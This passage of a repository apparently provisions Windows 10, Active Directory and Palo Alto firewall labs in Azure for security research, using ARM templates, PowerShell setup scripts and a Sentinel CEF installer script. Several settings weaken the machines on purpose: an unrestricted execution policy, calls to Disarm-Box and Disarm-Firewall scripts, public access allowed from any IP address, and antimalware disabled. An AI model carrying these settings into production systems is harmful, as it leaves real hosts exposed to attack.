9 | "type": "string"
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Location for all resources."
15 | }
16 | }
17 | },
18 | "resources": [
19 | {
20 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
21 | "type": "Microsoft.Compute/virtualMachines/extensions",
22 | "apiVersion": "2019-12-01",
23 | "location": "[parameters('location')]",
24 | "properties": {
25 | "publisher": "Microsoft.Powershell",
26 | "type": "DSC",
27 | "typeHandlerVersion": "2.77",
28 | "autoUpgradeMinorVersion": true,
29 | "settings": {
30 | "wmfVersion": "latest",
31 | "configuration": {
32 | "url": "[parameters('enableTLS12Script')]",
33 | "script": "Enable-TLS12.ps1",
34 | "function": "Enable-TLS12"
35 | },
36 | "configurationArguments": {}
37 | },
38 | "protectedSettings": {
39 | "configurationArguments": {}
40 | }
41 | }
42 | }
43 | ]
44 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/nestedtemplates/installAADConnect.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "installAADConnectScript": {
9 | "type": "string"
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Location for all resources."
15 | }
16 | }
17 | },
18 | "resources": [
19 | {
20 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
21 | "type": "Microsoft.Compute/virtualMachines/extensions",
22 | "apiVersion": "2019-12-01",
23 | "location": "[parameters('location')]",
24 | "properties": {
25 | "publisher": "Microsoft.Powershell",
26 | "type": "DSC",
27 | "typeHandlerVersion": "2.77",
28 | "autoUpgradeMinorVersion": true,
29 | "settings": {
30 | "wmfVersion": "latest",
31 | "configuration": {
32 | "url": "[parameters('installAADConnectScript')]",
33 | "script": "Install-AADConnect.ps1",
34 | "function": "Install-AADConnect"
35 | },
36 | "configurationArguments": {}
37 | },
38 | "protectedSettings": {
39 | "configurationArguments": {}
40 | }
41 | }
42 | }
43 | ]
44 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/nestedtemplates/vnet-dns-server.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualNetworkName": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "The name of the Virtual Network to Create"
9 | }
10 | },
11 | "virtualNetworkAddressRange": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "The address range of the new VNET in CIDR format"
15 | }
16 | },
17 | "subnets": {
18 | "type": "array",
19 | "metadata": {
20 | "description": "all subnets available"
21 | }
22 | },
23 | "DNSServerAddress": {
24 | "type": "array",
25 | "metadata": {
26 | "description": "The DNS address(es) of the DNS Server(s) used by the VNET"
27 | }
28 | },
29 | "location": {
30 | "type": "string",
31 | "metadata": {
32 | "description": "Location for all resources."
33 | }
34 | }
35 | },
36 | "resources": [
37 | {
38 | "type": "Microsoft.Network/virtualNetworks",
39 | "apiVersion": "2019-02-01",
40 | "name": "[parameters('virtualNetworkName')]",
41 | "location": "[parameters('location')]",
42 | "properties": {
43 | "addressSpace": {
44 | "addressPrefixes": [
45 | "[parameters('virtualNetworkAddressRange')]"
46 | ]
47 | },
48 | "dhcpOptions": {
49 | "dnsServers": "[parameters('DNSServerAddress')]"
50 | },
51 | "subnets": "[parameters('subnets')]"
52 | }
53 | }
54 | ]
55 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
1 | #Requires -Version 5
2 |
3 | Set-ExecutionPolicy Unrestricted -Force
4 |
5 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
6 |
7 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
8 | Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
9 |
10 | Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
11 | Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
12 | Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
13 | Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0
14 |
15 | Install-Module -Name xDnsServer -RequiredVersion 2.0.0
--------------------------------------------------------------------------------
/templates/azure/Win10-AD/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # Install DSC Modules
5 | & .\Install-DSC-Modules.ps1
6 |
7 | # Custom Settings applied
8 | & .\Prepare-Box.ps1
9 |
10 | # Additional configs
11 | & .\Disarm-Box.ps1
12 |
13 | # Additional Firewall rules
14 | & .\Disarm-Firewall.ps1
15 |
16 | # Enable PSRemoting
17 | & .\Configure-PSRemoting.ps1
18 |
19 | # Windows Security Audit Categories
20 | & .\Enable-WinAuditCategories.ps1 -SetDC
21 |
22 | # PowerShell Logging
23 | & .\Enable-PowerShell-Logging.ps1
24 |
25 | # Set SACLs
26 | & .\Set-SACLs.ps1
27 |
28 | # Set Wallpaper
29 | & .\Set-WallPaper.ps1
--------------------------------------------------------------------------------
/templates/azure/Win10-PAN-FW/README.md:
--------------------------------------------------------------------------------
1 | # Windows 10 + Palo Alto Networks VM-Series Firewall
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-PAN-FW%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10-PAN-FW%2Fazuredeploy.json)
4 |
5 | ## VM-Series Licensing
6 |
7 | For both AWS and Microsoft Azure, the licensing options are bring your own license (BYOL) and pay as you go/consumption-based (PAYG) subscriptions.
8 |
9 | * **BYOL**: Any one of the VM-Series models, along with the associated Subscriptions and Support, are purchased via normal Palo Alto Networks channels and then deployed through your AWS or Azure management console.
10 | * **PAYG (Pay-as-you-go)**: Purchase the VM-Series and select Subscriptions and Premium Support as an hourly subscription bundle from the AWS Marketplace.
11 | * **Bundle 1 contents**: VM-300 firewall license, Threat Prevention Subscription (inclusive of IPS, AV, Malware prevention) and Premium Support.
12 | * **Bundle 2 contents**: VM-300 firewall license, Threat Prevention (inclusive of IPS, AV, Malware prevention), WildFire™ threat intelligence service, URL Filtering, GlobalProtect Subscriptions and Premium Support.
13 |
14 | ## Accept Azure VM Marketplace Terms (MUST DO)
15 |
16 | * The Palo Alto Networks (PAN) VM-Series Firewall is deployed from Azure Marketplace. You need to accept the legal terms to use the VM.
17 | * **Make sure you run the commands below before deploying this template**
18 | * You can do it locally via [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/?view=azure-cli-latest) or via the [Azure Clould Shell](https://shell.azure.com/).
19 |
20 | Look for the PAN VM-Series Firewall you are deploying:
21 |
22 | ```
23 | az vm image list --all --publisher paloaltonetworks --offer vmseries1 --sku bundle2 --query '[0].urn'
24 | ```
25 |
26 | Accept terms:
27 |
28 | ```
29 | az vm image terms accept --urn paloaltonetworks:vmseries1:bundle2:7.1.1
30 | ```
--------------------------------------------------------------------------------
/templates/azure/Win10-PAN-FW/nestedtemplates/customScript.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "metadata": {
8 | "description": "Name of the VM to run scripts on"
9 | }
10 | },
11 | "extensionName": {
12 | "type": "string"
13 | },
14 | "fileUris": {
15 | "type": "array"
16 | },
17 | "commandToExecute": {
18 | "type": "string"
19 | },
20 | "location": {
21 | "type": "string",
22 | "metadata": {
23 | "description": "Location for all resources."
24 | }
25 | }
26 | },
27 | "resources": [
28 | {
29 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2019-03-01",
32 | "location": "[parameters('location')]",
33 | "properties": {
34 | "publisher": "Microsoft.Azure.Extensions",
35 | "type": "CustomScript",
36 | "typeHandlerVersion": "2.1",
37 | "autoUpgradeMinorVersion": true,
38 | "settings": {},
39 | "protectedSettings": {
40 | "commandToExecute": "[parameters('commandToExecute')]",
41 | "fileUris": "[parameters('fileUris')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-PAN-FW/nestedtemplates/customScriptExtension.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "minLength": 1,
8 | "metadata": {
9 | "description": "Name of the windows machine to run scripts on"
10 | }
11 | },
12 | "extensionName": {
13 | "type": "string"
14 | },
15 | "fileUris": {
16 | "type": "array"
17 | },
18 | "commandToExecute": {
19 | "type": "string"
20 | },
21 | "location": {
22 | "type": "string",
23 | "metadata": {
24 | "description": "Location for all resources."
25 | }
26 | }
27 | },
28 | "resources": [
29 | {
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2016-08-30",
32 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
33 | "location": "[parameters('location')]",
34 | "properties": {
35 | "publisher": "Microsoft.Compute",
36 | "type": "CustomScriptExtension",
37 | "typeHandlerVersion": "1.8",
38 | "autoUpgradeMinorVersion": true,
39 | "settings": {
40 | "fileUris": "[parameters('fileUris')]",
41 | "commandToExecute": "[parameters('commandToExecute')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
--------------------------------------------------------------------------------
/templates/azure/Win10-PAN-FW/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # Custom Settings applied
5 | & .\Prepare-Box.ps1
6 |
7 | # Set Windows Audit Policies
8 | & .\Enable-WinAuditCategories.ps1
9 |
10 | # Set Audit Rules from Set-AuditRule project
11 | & .\Set-SACLs.ps1
12 |
13 | # Set Wallpaper
14 | & .\Set-WallPaper.ps1
--------------------------------------------------------------------------------
/templates/azure/Win10-PAN-FW/scripts/Set-Up-CEF.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
6 | # *********** log tagging variables ***********
7 | INFO_TAG="[INSTALLATION-INFO]"
8 | ERROR_TAG="[INSTALLATION-ERROR]"
9 |
10 | # *********** Set Log File ***************
11 | LOGFILE="/var/log/FW-SETUP.log"
12 | echoerror() {
13 | printf "${RC} * ERROR${EC}: $@\n" 1>&2;
14 | }
15 |
16 | # *********** helk function ***************
17 | usage(){
18 | echo " "
19 | echo "Usage: $0 [option...]" >&2
20 | echo
21 | echo " -w Azure Sentinel Workspace ID"
22 | echo " -k Azure Sentinel Workspace Key"
23 | echo
24 | echo "Examples:"
25 | echo " $0 -w xxxxx -k xxxxxx"
26 | echo " "
27 | exit 1
28 | }
29 |
30 | # ************ Command Options **********************
31 | while getopts w:k:h option
32 | do
33 | case "${option}"
34 | in
35 | w) WORKSPACE_ID=$OPTARG;;
36 | k) WORKSPACE_KEY=$OPTARG;;
37 | h) usage;;
38 | \?) usage;;
39 | : ) echo "Missing option argument for -$OPTARG" >&2; exit 1;;
40 | * ) echo "Unimplemented option: -$OPTARG" >&2; exit 1;;
41 | esac
42 | done
43 |
44 | if ((OPTIND == 1))
45 | then
46 | echo "$ERROR_TAG No options specified"
47 | usage
48 | fi
49 |
50 | ######################
51 | # SYSLOG SERVER SETUP
52 | ######################
53 | python cef_installer.py $WORKSPACE_ID $WORKSPACE_KEY
--------------------------------------------------------------------------------
/templates/azure/Win10/README.md:
--------------------------------------------------------------------------------
1 | # Windows 10 Virtual Machine
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10%2Fazuredeploy.json)
4 |
--------------------------------------------------------------------------------
/templates/azure/Win10/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "adminUsername": {
6 | "value": "GEN-UNIQUE"
7 | },
8 | "adminPassword": {
9 | "value": "GEN-PASSWORD"
10 | },
11 | "numberOfWorkstations": {
12 | "value": 1
13 | },
14 | "vmNamePrefix": {
15 | "value": "WORKSTATION"
16 | },
17 | "vmNameSuffix": {
18 | "value": 5
19 | },
20 | "windowsDesktopSKU": {
21 | "value": "20h1-pro"
22 | },
23 | "windowsDesktopVersion": {
24 | "value": "latest"
25 | },
26 | "vmSize": {
27 | "value": "Standard_B2s"
28 | },
29 | "virtualNetworkName": {
30 | "value": "vnet-win"
31 | },
32 | "virtualNetworkAddressRange": {
33 | "value": "192.168.0.0/16"
34 | },
35 | "subnetRange": {
36 | "value": "192.168.2.0/24"
37 | },
38 | "subnetName": {
39 | "value": "snet-win"
40 | },
41 | "remoteAccessMode": {
42 | "value": "AllowPublicIP"
43 | },
44 | "allowedIPAddresses": {
45 | "value": "*"
46 | },
47 | "enableSysmon": {
48 | "value": false
49 | },
50 | "enableAntimalware": {
51 | "value": false
52 | },
53 | "_artifactsLocation": {
54 | "value": "https://raw.githubusercontent.com/OTRF/Blacksmith/master/"
55 | },
56 | "_artifactsLocationSasToken": {
57 | "value": ""
58 | }
59 | }
60 | }
--------------------------------------------------------------------------------
/templates/azure/Win10/demos/README.md:
--------------------------------------------------------------------------------
1 | # Demo Templates
2 |
3 | | Items | Deploy | Deploy US Gov |
4 | | :---| :---| :--- |
5 | | [WIn 10 Fresh Install](https://github.com/OTRF/Blacksmith/blob/master/templates/azure/Win10/demos/Win10-FreshInstall.json) | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10%2Fdemos%2FWin10-FreshInstall.json) | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FWin10%2Fdemos%2FWin10-FreshInstall.json) |
--------------------------------------------------------------------------------
/templates/azure/Win10/nestedtemplates/customScriptExtension.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string",
7 | "minLength": 1,
8 | "metadata": {
9 | "description": "Name of the windows machine to run scripts on"
10 | }
11 | },
12 | "extensionName": {
13 | "type": "string"
14 | },
15 | "fileUris": {
16 | "type": "array"
17 | },
18 | "commandToExecute": {
19 | "type": "string"
20 | },
21 | "location": {
22 | "type": "string",
23 | "metadata": {
24 | "description": "Location for all resources."
25 | }
26 | }
27 | },
28 | "resources": [
29 | {
30 | "type": "Microsoft.Compute/virtualMachines/extensions",
31 | "apiVersion": "2021-11-01",
32 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
33 | "location": "[parameters('location')]",
34 | "properties": {
35 | "publisher": "Microsoft.Compute",
36 | "type": "CustomScriptExtension",
37 | "typeHandlerVersion": "1.8",
38 | "autoUpgradeMinorVersion": true,
39 | "settings": {
40 | "fileUris": "[parameters('fileUris')]",
41 | "commandToExecute": "[parameters('commandToExecute')]"
42 | }
43 | }
44 | }
45 | ]
46 | }
--------------------------------------------------------------------------------
/templates/azure/Win10/nestedtemplates/customScriptExtensionArray.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "virtualMachines": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of endpoints to run scripts on"
9 | }
10 | },
11 | "fileUris": {
12 | "type": "array",
13 | "defaultValue": []
14 | },
15 | "commandToExecute": {
16 | "type": "string"
17 | },
18 | "location": {
19 | "type": "string",
20 | "metadata": {
21 | "description": "Location for all resources."
22 | }
23 | }
24 | },
25 | "resources": [
26 | {
27 | "type": "Microsoft.Compute/virtualMachines/extensions",
28 | "apiVersion": "2021-07-01",
29 | "name": "[concat(parameters('virtualMachines')[copyIndex('CustomScriptCopy')].vmname, '/', parameters('virtualMachines')[copyIndex('CustomScriptCopy')].extensionName)]",
30 | "location": "[parameters('location')]",
31 | "copy": {
32 | "name": "CustomScriptCopy",
33 | "count": "[length(parameters('virtualMachines'))]"
34 | },
35 | "properties": {
36 | "publisher": "Microsoft.Compute",
37 | "type": "CustomScriptExtension",
38 | "typeHandlerVersion": "1.8",
39 | "autoUpgradeMinorVersion": true,
40 | "settings": {
41 | "fileUris": "[parameters('fileUris')]",
42 | "commandToExecute": "[parameters('commandToExecute')]"
43 | }
44 | }
45 | }
46 | ]
47 | }
48 |
--------------------------------------------------------------------------------
/templates/azure/Win10/nestedtemplates/sysmonInstall.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "vmName": {
6 | "type": "string"
7 | },
8 | "installSysmonScript": {
9 | "type": "string"
10 | },
11 | "location": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Location for all resources."
15 | }
16 | }
17 | },
18 | "resources": [
19 | {
20 | "name": "[concat(parameters('vmName'), '/PowerShellDSC')]",
21 | "type": "Microsoft.Compute/virtualMachines/extensions",
22 | "apiVersion": "2019-12-01",
23 | "location": "[parameters('location')]",
24 | "properties": {
25 | "publisher": "Microsoft.Powershell",
26 | "type": "DSC",
27 | "typeHandlerVersion": "2.77",
28 | "autoUpgradeMinorVersion": true,
29 | "settings": {
30 | "wmfVersion": "latest",
31 | "configuration": {
32 | "url": "[parameters('installSysmonScript')]",
33 | "script": "Install-Sysmon.ps1",
34 | "function": "Install-Sysmon"
35 | },
36 | "configurationArguments": {}
37 | },
38 | "protectedSettings": {
39 | "configurationArguments": {}
40 | }
41 | }
42 | }
43 | ]
44 | }
--------------------------------------------------------------------------------
/templates/azure/Win10/scripts/Install-DSC-Modules.ps1:
--------------------------------------------------------------------------------
1 | #Requires -Version 5
2 |
3 | Set-ExecutionPolicy Unrestricted -Force
4 |
5 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
6 |
7 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
8 | Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
9 |
10 | Install-Module -Name ActiveDirectoryDsc -RequiredVersion 6.0.1
11 | Install-Module -Name NetworkingDsc -RequiredVersion 8.2.0
12 | Install-Module -Name xPSDesiredStateConfiguration -RequiredVersion 9.1.0
13 | Install-Module -Name ComputerManagementDsc -RequiredVersion 8.4.0
--------------------------------------------------------------------------------
/templates/azure/Win10/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # Install DSC Modules
5 | & .\Install-DSC-Modules.ps1
6 |
7 | # Custom Settings applied
8 | & .\Prepare-Box.ps1
9 |
10 | # Additional configs
11 | & .\Disarm-Box.ps1
12 |
13 | # Additional Firewall rules
14 | & .\Disarm-Firewall.ps1
15 |
16 | # Enable PSRemoting
17 | & .\Configure-PSRemoting.ps1
18 |
19 | # Set Windows Audit Policies
20 | & .\Enable-WinAuditCategories.ps1
21 |
22 | # PowerShell Logging
23 | & .\Enable-PowerShell-Logging.ps1
24 |
25 | # Set Audit Rules from Set-AuditRule project
26 | & .\Set-SACLs.ps1
27 |
28 | # Set Wallpaper
29 | & .\Set-WallPaper.ps1
--------------------------------------------------------------------------------